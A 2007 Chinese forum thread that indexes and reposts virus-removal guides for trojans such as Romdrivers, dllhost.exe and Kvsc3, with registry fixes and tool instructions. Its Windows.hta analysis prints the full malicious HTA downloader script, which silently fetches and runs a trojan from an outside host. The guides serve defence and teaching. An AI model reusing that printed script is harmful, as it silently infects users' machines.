为了让大家能更快的摆脱病毒的烦恼，我想把些好的解决病毒的方法和工具贴出来。其实很多时候大家到网上找找能找到解决办法的。我只是为大家做点基础工作。闲话不多说，开工了。。
此贴是索引贴。下帖贴出具体内容.

2楼、系统时间被改为2005年的病毒清除指南
3楼、Windows.hta Server.hta 病毒简单分析及解决办法+如何查看系统属性隐藏文件的方法
4楼、“罗姆”病毒再次升级 本博更新专杀工具（最新版本V1.2）
5楼、无法打开杀毒软件 应用程序正常初始化(0xc00000ba)失败的解决办法
6楼、Win32.Troj.Romdrivers.ka病毒专杀工具
7楼、dllhost.exe病毒清除办法
8楼、Kvsc3.exe、RemoteDbg.dll、windds32.dll、xywrebh.exe、rundl132.exe清除办法+SRE的下载及使用方法
9楼、SVCH0ST.exe trtbc.dll licmon.exe病毒清除办法
10楼、MSN病毒 photos.zip病毒 syshosts.dll清除办法
11楼、Kavs0.dll 、Servera.exe病毒清除办法
12楼、Run a DLL as an App 病毒 rundll.exe、autorun.inf 清除办法
13楼、crs.exe病毒清除办法
14楼、rundllfromwin2000.exe病毒清除办法
15楼、rundll2000.exe病毒清除办法
16楼、AUT0CHK.PIF Rpcs.exe wmid.exe IEXPLORE.Sys IEXPLORE.Dat svrhost.exe Kernel32.exe kl.exe
17楼、SVCH0ST.EXE yqr.exe mhso.exe TIMPLATF0RM.exe wgs3.exe Updaterun.exe IEINFO5.sys isignup.sys
18楼、LgSy0.dll LgSy1.dll Rav20.dll iexpl0re.exe rundl132.exe winlog0n.exe病毒清除办法
19楼、LgSy0.dll cmdbcs.dll Kernel32.exe iexpl0re.exe c0nime.exe servicer.exe SystemKb.sys NewInfo.rxk
20楼、Ghook.dll svchost.exe病毒清除办法
21楼、608769M.BMP crasos.exe Kernelmh.exe servet.exe ntmsoprq.exe RpcS.exe compmgmt.exe病毒
22楼、winform.exe mppds.exe cmdbcs.exe upxdnd.exe svchost.exe Ghook.dll autorun.exe超级变态病毒
23楼、病毒常用伎俩解决办法
24楼、病毒wsctf.exe和explorer.exe 清除办法
25楼、QQ自动发送文件病毒解决方法
26楼、针对插入式木马的清除方法
27楼、流氓网站8749,7255,4318专杀工具
28楼、修改系统时间病毒专杀工具
29楼、“AV终结者”中毒后5步解决方案-以及专杀工具下载[中毒电脑上网看此文]屏蔽毒字
30楼、Exploit.Win32.IMG-ANI.x这个病毒的专杀清除方法
31楼、破坏杀毒软件 MALDAL.D病毒
32楼、“红色代码III”手动清除指南   
33楼、删除Sircam病毒的方法
34楼、Trojan.DL.IEFrame.ay木马病毒的专杀
35楼、病毒Worm.Pabug.ck(OSO.exe)分析与专杀方法
36楼、“帕虫（worm.pabug)”病毒的专杀工具下载和专杀方法
37楼、34种常见木马清理方法
38楼、随机8位数字和字母组合的恶性U盘病毒的分析和专杀方法
39楼、dtstorp.exe 和ouvjwsc.exe（杀毒软件无法正常启动）病毒的专杀解决方法
40楼、弹出网页或不定时弹出网页的解决办法
52楼、DLTC系列病毒专用检测清除工具
53楼、worm.viking病毒的清除方法+SVCHOST.EXE SERVICES.EXE rundl132.exe ctfnom.exe cmdbcs.dll mppds.dll病毒清除办法
54楼、1explorer.exe 病毒清除办法+关于Distributed Link Tracking ClientlmXX的剖析
55楼、user32.dll病毒清除办法
56楼、Trojan-psw.win32.online Games.es 病毒清除办法及专杀工具
57楼、NewInfo.rxk 病毒清除办法+Servera.exe crasos.exe winlog0a.exe rundl13a.exe c0nima.exe cftmoa.exe病毒清除方法
58楼、mctet.dll病毒清除办法+Trojan.DL.Agent.blq病毒清除办法
59楼、cdnup.exe病毒清除办法+百度打不开的解决办法
60楼、mppds.exe,iexp1ora.winlog0a.exe，SystemKb.sys,rundl13a.exe，Servera.exe病毒解决办法+盗Q木马 system2.jmp SystemKb.sys 解决方案
61楼、ADWare.Win32.Boran.w病毒清除办法+Trojan-PSW.Win32.OnLineGames.jp病毒分析及解决办法
62楼、LgSyl.dll病毒清除方法+LgSyzr.dll病毒解决方案+LgSym.dll winlog0n.exe iexpl0re.exe病毒解决方案
63楼、soundmix.dll病毒清除方法+全能搜索 adpu64.sys 病毒清除方法
64楼、PvSec.dll病毒清除方法+RootKit.CallGate.k病毒的解决办法+Trojan.PSW.QQGame.ct病毒清除方案
65楼、iexp1ore.exe/iexpl0re.exe/winlog0n.exe/alga.exe病毒的清除方案+twunk32.exe病毒+WPRINT.EXE,windhcp.ocx,wsvbs.exe病毒+iexp1ore.exe和LgSyzr.dll病毒的解决办法
66楼、Trojan-Downloader.Win32.Aqent.bbb病毒清除方法+如何从SRE日志中查找该病毒并作出相应处理方法+日志分析方法
67楼、winhelp.dll病毒清除方案+Trojan-psw.win32.nilage.bft清除方案+Trojan-psw.win32.nilage.azd清除方案
68楼、Trojan.Win32.VB.atg病毒分析及解决办法+autorun.vbs病毒解决办法+解析便宜吧（pian18.com）的流氓行为+Trojan-PSW.Win32.Nilage.avi病毒分析及清除方法
69楼、algssl.exe（tel.xls变种）病毒的手动清除+Trojan-PSW.Win32.Delf.oc病毒分析与解决方案+Trojan-PSW.Win32.OnLineGames.ar解决方案+Trojan.PSW.wowar.rg（sb.dll、temp.exe）的手工查杀+手工清除 wsctf.exe和EXPLORER.EXE 病毒
70楼、system18.sys ,system.jmp盗Q木马解决方案+sxs.exe、rose.exe病毒及清理办法+Trojan-PSW.Win32.OnLineGames.cc病毒分析及清除办法
71楼、木马下载器（WinInfo.rxk WinInfo.bak）病毒分析及解决方案+梦幻西游木马（xydll.dll）病毒分析与解决办法+Trojan-PSW.Win32.OnLineGames.arf病毒分析及解决办法+解决pagefile.com“落雪”病毒的方法
72楼、查杀木马 RAV0088.exe RAV0088.DAT+ghost.pif新变种导致杀毒软件0xc00000ba失败的解决方法















[ 本帖最后由 幸运的西瓜 于 2007-8-11 20:06 编辑 ]

系统时间被改为2005年的病毒清除指南——系统配置实用程序 msconfig
     关于“系统时间被改为2005年的病毒”清除办法，网上有很多，本来我不打算再写，但是今天一个朋友问到我这个问题，于是索性就借这个机会给大家介绍一下系统配置实用程序（msconfig）在杀毒方面的应用。

    经过分析，这个病毒运行后在各个分区根目录下创建autorun.inf和rising.exe这两个文件，并且添加一项服务，该服务以随机8位字母和数字组合命名，随机启动后修改系统时间，导致因时间问题使得部分安全软件认为系统“非法授权”而不能正常运行。
解决步骤：

1、下载提供的autorun专杀及免疫工具 ,下载解压后一定要放到桌面上；


2、点“开始”——运行——输入“msconfig”——回车，此时打开了系统配置实用程序，然后按照下图所示操作：首先点“服务”——勾选“隐藏所有microsoft服务”——勾选病毒服务（随机8位字母和数字组合的）——全部禁用——确定。


3、重新启动计算机，此时将不再加载病毒服务，重新启动后第一件事情是运行桌面上的autorun专杀及免疫工具 ；

4、升级杀毒软件全盘杀毒。
此文出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 01:04 编辑 ]

Windows.hta Server.hta 病毒简单分析及解决办法

最近几天接连遇见HTA（HTML Application的缩写，HTML应用程序）编写的病毒下载器，主要是以下这两个：
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Windows.hta
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Server.hta

以Windows.hta为例，看下代码：

=============================================================
<html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://www.if56.cn/lo/downmm.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i<Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\abc[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html>
=============================================================

程序随机自启动，成功执行后连接到地址http://www.if56.cn/lo/downmm.html下载木马，downmm.html代码如下：

=============================================================
<html>
<title>
downmm
</title>
<script src="abc.exe"></script>
<body>
start download.............................
</body>
</html>
=============================================================

这个abc.exe经过avast扫描，发现木马病毒：WIN32:Nilage-AI

解决办法：
如果防火墙提示Windows.hta 或 Server.hta 访问网络，即是中毒的表现，解决办法很简单，删除C:\Documents and Settings\All Users\「开始」菜单\程序\启动\里面的文件即可。（ 如何查看系统属性隐藏文件 ）
=============================================================
如何查看系统属性隐藏文件：
(一)
1.打开"我的电脑"
2.选择"工具"菜单的"文件夹选项"项,打开"文件夹选项"对话框..
3选择"查看"选项卡.
4.把"隐藏受保护的操作系统文件"前的勾去掉..
5.再选择"显示所有文件和文件夹"就OK.
(二)
1.工具栏-文件选项-查看-去掉“隐藏受保护的操作系统文件” 及选中“显示所有文件和文件夹” 这样所有隐藏的文件都可以看到实在不行就恢复默认值 再继续上述操作 .
(三)
如果以上方法无效，则看这个解决不能显示隐藏文件

打开记事本，把下面两条虚线之间的内容复制进去，

--------------------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001
--------------------------------------------------------------------

保存文件名：“显示被隐藏的文件.REG”，（确保在“文件夹选项”中去掉“隐藏已知文件类型的扩展名”），双击运行此文件，再重新到“文件夹选项”中设置显示隐藏文件。

注意：如果上述方法无效，先检查CheckedValue的类型是否为REG_DWORD，如果不是则删掉“李鬼”CheckedValue（例如在本“案例”中，应该把类型为REG_SZ的CheckedValue删除）。然后单击右键“新建”--〉“Dword值”，并命名为CheckedValue，然后修改它的键值为1，这样就可以选择“显示所有隐藏文件”。

经过刚才一番操作，我的电脑里的隐藏文件可以看到了，假如上述方法无效，那么可能是

HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden

的数据丢失或损坏，遇到这种情况，找一部没有问题的电脑，把

HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden

这个分支导出（假如命名为1.reg）；然后备份有问题的电脑的该注册表分支；最后把1.reg导入解决问题。

附：文件夹选项默认值：(XP系统，可以将以下文本保存为注册表文件导入注册表，以修复相关问题)

--------------------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden]
"Text"="@shell32.dll,-30499"
"Type"="group"
"Bitmap"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\
       00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,53,00,\
       48,00,45,00,4c,00,4c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,34,00,00,\
       00
"HelpID"="shell.hlp#51131"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30501"
"Type"="radio"
"CheckedValue"=dword:00000002
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51104"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
--------------------------------------------------------------------

出处：http://hi.baidu.com/peaset/  (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 01:03 编辑 ]

“罗姆”病毒再次升级 本博更新专杀工具（最新版本V1.2）

罗姆”病毒于本博发布专杀工具第二天进行了再次升级，新的版本作了一些改进，增加一处BHO模块，并起名为Relive.dll ，意思是“重生”，可见病毒作者是用心的。该模块运行后能够关闭多个杀软的实时监控并阻止杀软升级。

使用方法：

1、下载Romdrivers.ka_1.2.rar 和 anti_ws_1.2.rar

2、首先使用 Win32.Troj.Romdrivers.ka.exe ，然后将 anti_ws.exe 复制到杀毒软件所在的目录运行一次即可。最后重新启动计算机。

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 02:53 编辑 ]

无法打开杀毒软件 应用程序正常初始化(0xc00000ba)失败的解决办法


原因分析：
           ws2_32.dll是Windows Sockets应用程序接口，用于支持Internet和网络应用程序。程序运行时会自动调用ws2_32.dll文件，ws2_32.dll是个动态链接库文件,位于系统文件夹中，Windows在查找动态链接库文件时，会先在应用程序当前目录搜索，如果没有找到然后才会搜索Windows所在目录，如果还是没有会搜索system32和system目录。一些病毒利用此原理在杀软目录中建立了ws2_32.dll文件或文件夹,在杀软看来这是一个它需要的文件而调用，这个所谓的“文件”又不具备真正地ws2_32.dll文件所具有的功能，所以杀软就无法运行了.提示：应用程序正常初始化(0xc00000ba)失败

解决办法：
       到杀毒软件的安装目录找到以"ws2_32.dll"命名的文件或文件夹，删除即可。注意：如果看不到"ws2_32.dll"文件夹，原因是该文件夹加了系统隐藏属性，即使找到"ws2_32.dll"文件夹也无法删除，原因是里面有一个名为1.的文件夹，该文件夹windows环境不能识别，因此出现系统找不到路径的提示。为此，用于清除"ws2_32.dll"文件夹的专用工具，使用方法是下载解压后将anti_ws.exe复制到杀毒软件的安装目录，然后运行anti_ws.exe即可。（这个工具4楼已上传。）

友情提示：
            一般只删除这个文件是解决不了问题的，因为病毒程序会监视系统，当发现该文件没了会自动恢复。目前已知的情况是中了病毒Win32.Troj.Romdrivers.ka ，次毒解决办法下楼给出。

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 01:20 编辑 ]

Win32.Troj.Romdrivers.ka病毒专杀工具

病毒名称：Win32.Troj.Romdrivers.ka （毒霸）
中文名称：罗姆
病毒类型：木马
影响系统：Win 9x/ME,Win 2000/NT,Win XP,Win 2003
病毒文件：romdrivers.dll,fyso.exe, jtso.exe, mhso.exe, qjso.exe, qqso.exe, wgso.exe, wlso.exe, wmso.exe, woso.exe, ztso.exe, daso.exe, tlso.exe, rxso.exe,fyso0.dll, jtso0.dll, mhso0.dll, qjso0.dll, qqso0.dll, wgso0.dll, wlso0.dll, wmso0.dll, woso0.dll, ztso0.dll, daso0.dll, tlso0.dll, rxs0.dll 等

====================================================================
病毒行为:
该病毒会导致大量安全软件运行失败；会下载大量盗号木马到用户计算机来盗取用户帐号信息。

1、释放以下病毒文件：
系统分区:\Program Files\Internet Explorer\romdrivers.dll
系统分区:\Program Files\Internet Explorer\romdrivers.bak
系统分区:\Program Files\Internet Explorer\romdrivers.bkk

2、创建以下注册表项来使病毒文件随系统启动来启动（其CLSID不定）：
HKCR\CLSID\{0CD68AC9-FF63-3E61-626B-B663E62F6236}
HKCR\CLSID\{0CD68AC9-FF63-3E61-626B-B663E62F6236}\InProcServer32\(Default) "C:\Program Files\Internet Explorer\romdrivers.dll"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{0CD68AC9-FF63-3E61-626B-B663E62F6236} ""

3、尝试删除以下注册表项来防止其它病毒的干扰：
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{DE35052A-9E37-4827-A1EC-79BF400D27A4}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{AEB6717E-7E19-11d0-97EE-00C04FD91972}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{DD7D4640-4464-48C0-82FD-21338366D2D2}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{131AB311-16F1-F13B-1E43-11A24B51AFD1}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{274B93C2-A6DF-485F-8576-AB0653134A76}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{1496D5ED-7A09-46D0-8C92-B8E71A4304DF}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{0CB68AD9-FF66-3E63-636B-B693E62F6236}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{09B68AD9-FF66-3E63-636B-B693E62F6236}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{754FB7D8-B8FE-4810-B363-A788CD060F1F}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{A6011F8F-A7F8-49AA-9ADA-49127D43138F}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{06A68AD9-FF56-6E73-937B-B893E72F6226}
5HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{01F6EB6F-AB5C-1FDD-6E5B-FB6EE3CC6CD6}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{BC0ACA58-6A6F-51DA-9EFE-9D20F4F621BA}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{AEB6717E-7E19-11d0-97EE-00C04FD91972}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{99F1D023-7CEB-4586-80F7-BB1A98DB7602}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{FEB94F5A-69F3-4645-8C2B-9E71D270AF2E}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{923509F1-45CB-4EC0-BDE0-1DED35B8FD60}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{42A612A4-4334-4424-4234-42261A31A236}

4、通过查询以下注册表项的某些键值来获取相关安全软件的安装目录，在获得安装目录下生成以系统文件名"ws2_32.dll"命名的文件夹，从而使相关安全软件运行失败。
SOFTWARE\\rising\\Rav
SOFTWARE\\Kingsoft\\AntiVirus
SOFTWARE\\JiangMin
SOFTWARE\KasperskyLab\InstalledProducts\Kaspersky Anti-Virus Personal
SOFTWARE\\KasperskyLab\\SetupFolders
SOFTWARE\Network Associates\TVD\Shared Components\Framework
SOFTWARE\Eset\Nod\CurrentVersion\Info
SOFTWARE\\Symantec\\SharedUsage
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

5、将NOD32的库文件nod32.000改名为nod32.000.bak，从而使NOD32无法查杀病毒。

6、尝试查找并关闭窗口名为“卡巴斯基反病毒Personal”的窗口和其所属的线程。

7、添加以下注册表项来记录当前在用户计算机上的病毒个数及每个病毒的版本信息，以便病毒升级，如下：其中"Me"记录病毒本体的版本，数字表示下载的病毒的序号，其值记录相应病毒的版本信息。
HKEY_CURRENT_USER\Software\SetVer\ver Me "1.32"
HKEY_CURRENT_USER\Software\SetVer\ver 1 "2.96"
HKEY_CURRENT_USER\Software\SetVer\ver 2 "2.98"
HKEY_CURRENT_USER\Software\SetVer\ver 3 "2.992"
HKEY_CURRENT_USER\Software\SetVer\ver 4 "2.93"
HKEY_CURRENT_USER\Software\SetVer\ver 5 "2.93"
HKEY_CURRENT_USER\Software\SetVer\ver 6 "2.96"
HKEY_CURRENT_USER\Software\SetVer\ver 7 "2.96"
HKEY_CURRENT_USER\Software\SetVer\ver 8 "2.93"
HKEY_CURRENT_USER\Software\SetVer\ver 9 "2.99"
HKEY_CURRENT_USER\Software\SetVer\ver 10 "1.98"
HKEY_CURRENT_USER\Software\SetVer\ver 11 "1.991"
HKEY_CURRENT_USER\Software\SetVer\ver 12 "1.891"
HKEY_CURRENT_USER\Software\SetVer\ver 13 "1.91"
HKEY_CURRENT_USER\Software\SetVer\ver 14 "1.0"

8、创建消息钩子，将病毒文件romdrivers.dll注入到explorer进程中，然后通过explorer来连接网络进行病毒自更新，下载大量盗号木马到用户计算机来盗取用户相关帐号。

9、进行ARP欺骗，造成局域网网络阻塞并导致无法上网。

10、删除hosts文件来取消用户对某些网站的屏蔽。

11、下载的木马运行后会释放以下文件到Temp目录：
fyso.exe, jtso.exe, mhso.exe, qjso.exe, qqso.exe, wgso.exe, wlso.exe, wmso.exe, woso.exe, ztso.exe, daso.exe, tlso.exe, rxso.exe
fyso0.dll, jtso0.dll, mhso0.dll, qjso0.dll, qqso0.dll, wgso0.dll, wlso0.dll, wmso0.dll, woso0.dll, ztso0.dll, daso0.dll, tlso0.dll, rxs0.dll 等

12、下载的木马运行后创建以下注册表项：把病毒exe文件文件名中的“o”改为“a” 做为注册表启动项的键名，如： 　
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fysa "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fyso.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wosa "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\woso.exe"

====================================================================

特别提示：
           如果在使用专杀工具后杀毒软件仍然无法打开，请到杀毒软件所在目录找到以"ws2_32.dll"命名的文件夹，删除即可。如果找不到这个文件或者找到了但是删除了，请下载使用"ws2_32.dll"专用清除工具，>>（这个工具4楼已上传）

说明文档：
1、本软件适用于检测清除ARP病毒Win32.Troj.Romdrivers.ka；

2、部分杀毒软件的主动防御可能会误报病毒，请大家放心使用；如果误报，请暂时关闭杀毒软件的实时监控；

3、部分用户使用时会遇到杀毒软件的注册表监控提示，请选择“同意”；否则杀毒失败；


出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 01:22 编辑 ]

dllhost.exe病毒清除办法

现象描述：各个硬盘分区有一个文件夹runauto.. ，%windows%目录下有特征的病毒文件dllhost.exe

清除步骤：（以下所有操作在 IceSword 中进行）Iceword v1.20下载及简单介绍 （本问最后部分有）
1、禁止进程创建。

2、结束病毒进程%windows%\dllhost.exe。

3、删除病毒文件：
     %windows%\dllhost.exe
     %windows%\cmd.exe.exe
     %windows%\regedit.exe.exe
     %windows%\setuprs1.exe
     x:\autorun.inf     (X代表硬盘各个分区及U盘盘符)
     x:\autorun.inf.tmp
         
4、删除病毒服务项，即删除注册表以下分支：
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\COMSystemApp
此外，HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List分支下的"C:\\windows\\dllhost.exe"="C:\\windows\\dllhost.exe:*:Enabled:dllhost.exe"也要删除。

5、删除病毒添加的IFEO项，即删除注册表以下分支：
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe

6、取消IceSword的“禁止进程创建”，关闭IceSword。

7、删除各个分区及U盘里面的runauto..文件夹，删除方法：（以 D 盘为例）

开始——运行——输入“cmd”——输入“D: ”——输入“rd /s/q runauto...\ ”

8、完毕。

Iceword v1.20下载及简单介绍
IceSword是一斩断黑手的利刃。它适用于Windows 2000/XP/2003操作系统，用于查探系统中的幕后黑手(木马后门)并作出处理，当然使用它需要用户有一些操作系统的知识。
在对软件做讲解之前，首先说明第一注意事项 ：此程序运行时不要激活内核调试器(如softice)，否则系统可能即刻崩溃。另外使用前请保存好您的数据，以防万一未知的Bug带来损失。
IceSword目前只为使用32位的x86兼容CPU的系统设计，另外运行IceSword需要管理员权限。
如果您使用过老版本，请一定注意，使用新版本前要重新启动系统，不要交替使用二者。
IceSword内部功能是十分强大的。可能您也用过很多类似功能的软件，比如一些进程工具、端口工具，但是现在的系统级后门功能越来越强，一般都可轻而易举地隐藏进程、端口、注册表、文件信息，一般的工具根本无法发现这些“幕后黑手”。IceSword使用大量新颖的内核技术，使得这些后门躲无所躲。

【注意】内附的帮助文件详细说明了此工具的用法，请在使用前详细阅读，使用者需具备一定的操作系统知识，菜鸟勿轻易操作，任何错误的操作可能导致系统崩溃甚至数据丢失。

下载地址：http://202.38.64.10/~jfpan/download/IceSword120_cn.zip

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 01:29 编辑 ]

Kvsc3.exe、RemoteDbg.dll、windds32.dll、xywrebh.exe、rundl132.exe清除办法

现象描述：病毒于每天上午11:00准时发作，发作现象是弹出N个CMD窗口；中毒后无法打开一些网页，在百度搜索里搜索“病毒”二字浏览器即自动关闭。无法打开一些安全软件。

清除步骤:
1、解除IFEO劫持，下载后运行一次即可。（请稍后目前找不到。等找到立即上传。）

2、用SRE修改注册表,删除以下键(如果不会，请看SRE的下载及使用方法)：

<恢复BOOT菜单><c:\windows\BOOT-hf.exe>
<load><C:\WINDOWS\uninstall\rundl132.exe>
<vbcyhid><C:\Program Files\Common Files\System\terebmi.exe>
<xywrebh><C:\Program Files\Common Files\Microsoft Shared\nuygtvw.exe>  
<upxdnd><C:\WINDOWS\upxdnd.exe>
<Kvsc3><C:\WINDOWS\Kvsc3.exe>
<cmdbcs><C:\WINDOWS\cmdbcs.exe>
<mppds><C:\WINDOWS\mppds.exe>
<twin><C:\WINDOWS\system32\ctfnom.exe>
<{C54C4AFB-8A2A-6C1E-BA41-C10F02940702}><C:\WINDOWS\system32\18.dll>
<{C51C4AFB-8A3A-6C1E-BA41-C20F02940603}><C:\WINDOWS\system32\20.dll>
<{91B1E846-2BEF-4345-8848-7699C7C9935F}><C:\Program Files\Common Files\Microsoft Shared\MSINFO\SysWFGQQ2.dll>
<fzg><; C:\WINDOWS\Config\svhost32.exe>
<mhs2><; C:\DOCUME~1\new\LOCALS~1\Temp\mhs2.exe>
<rxzs><; C:\DOCUME~1\new\LOCALS~1\Temp\rxzs.exe>
<wlzs><; C:\DOCUME~1\new\LOCALS~1\Temp\wlzs.exe>
<zts2><; C:\DOCUME~1\new\LOCALS~1\Temp\zts2.exe>
<Load>


3、用SRE删除下面这个服务(如果不会，请看SRE的下载及使用方法)：
一、如何扫描？

如下图所示,运行软件—智能扫描—扫描—保存—得到 LOG（日志）。
然后将日志(SREng.log)中的内容全部复制粘贴到论坛.


二、如何修复？

1、注册表操作:
(1)注册表删除操作:
在SREng中 点 “启动项目”—>注册表 —>选中有问题的（就是告诉你要删的那些）—>点"删除"按钮.


(2)注册表修复操作:
在SREng中 点"启动项目" —>"注册表" —>然后鼠标左键在对应要修复的项上单击,—>然后点击"编辑" 修改对应"值" 如下即可
名字shell                       数据Explorer.exe
名字Userinit                  数据C:\WINDOWS\system32\Userinit.exe,       (逗号不可省略,NT系统为C:\WINNT\system32\Userinit.exe,)
名字AppInit_DLLs         数据为空


2、删除服务
在SREng中 点"启动项目" —>服务—>Win32服务应用程序—>勾选 "隐藏已认证的微软项目"—>选中要删除的服务—>点“删除服务”—>点“设置”—>点"NO 否".


3、删除驱动
在SREng中 点"启动项目" —>服务—>驱动程序—>勾选“隐藏微软已经认证的项目”—>点中你要删除的驱动—>点右下角的"删除服务" —>点“设置”按钮.


4、修复文件关联  
在SREng中 点"系统修复"—> "文件关联"—>点"全选"—>点"修复"

5、修复windows       shell
在SREng中 点"系统修复"—> "windows       shell"—>点"全选"—>点"修复"

6、删除浏览器加载项（BHO）  
在SREng中 点"系统修复" —>"浏览器加载项" —>鼠标左键在对应要修复的项上单击 —>点击"删除所选内容"

7、修复IE  
先关闭所有IE窗口—>在SREng中 点“系统修复”—>"Internet Explorer"—>将左下角的 "全部"打勾选中—>点"修复".


8、修复API HOOK

------------------------------------------------------------------------------------------------------------------------------
附:http://www.kztechs.com/sreng/help2/
这是官方用户手册，图文并茂，讲解很详细、全面，在这里我就不獒述了。
------------------------------------------------------------------------------------------------------------------------------
Remote Packet Capture Protocol v.0 (experimental) / rpcapd
Remote Debug Service / RemoteDbg
Win32 Display Driver / Win32DDS


4、显示“受保护的操作系统文件”

unlocker下载及使用方法：   
[  1、安装unlocker
    2、用unlocker删除文件，方法举例：比如我们现在要删除c:\windows\system32\drivers\aisi.sys这个文件：找到c:\windows\system32\drivers目录下，找到aisi.sys，点右键——Unlocker，然后在出来的对话框中，选择“删除”点确定便可，如果弹出一个对话框，选“全部解锁”，然后这个对话框就自动关闭，接着直接删除这个文件就好了。这样文件便删除了。]

使用unlocker删除以下文件：

C:\WINDOWS\system32\20.dll
C:\WINDOWS\system32\18.dll
C:\WINDOWS\system32\cmdbcs.dll
